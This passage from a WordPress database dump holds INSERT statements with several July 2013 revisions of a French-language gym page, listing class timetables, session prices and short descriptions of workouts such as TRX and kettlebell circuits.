mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:30:27', '2013-07-03 17:30:27', '', 11, 'http://www.crosstrainingcenter.be/?p=186', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(185, 1, '2013-07-03 17:28:40', '2013-07-03 17:28:40', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table >\r\n<tr >\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\" >MARDI</td>\r\n<td class=\"ttitreh\" >MERCREDI</td>\r\n<td class=\"ttitreh\" >JEUDI</td>\r\n<td  class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr >\r\n<td  class=\"ttitre\">17h30</td>\r\n<td  class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:28:40', '2013-07-03 17:28:40', '', 11, 'http://www.crosstrainingcenter.be/?p=185', 0, 'revision', '', 0),
(184, 1, '2013-07-03 17:24:45', '2013-07-03 17:24:45', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table >\r\n<tr >\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\" >MARDI</td>\r\n<td class=\"ttitre\" >MERCREDI</td>\r\n<td class=\"ttitre\" >JEUDI</td>\r\n<td  class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr >\r\n<td  class=\"ttitre\">17h30</td>\r\n<td  class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n<td >TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:24:45', '2013-07-03 17:24:45', '', 11, 'http://www.crosstrainingcenter.be/?p=184', 0, 'revision', '', 0),
(189, 1, '2013-07-03 17:38:00', '2013-07-03 17:38:00', '<h2>Team Training :</h2>\r\n<h4>En semaine :</h4>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h4>Le week-end :</h4>\r\n\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; 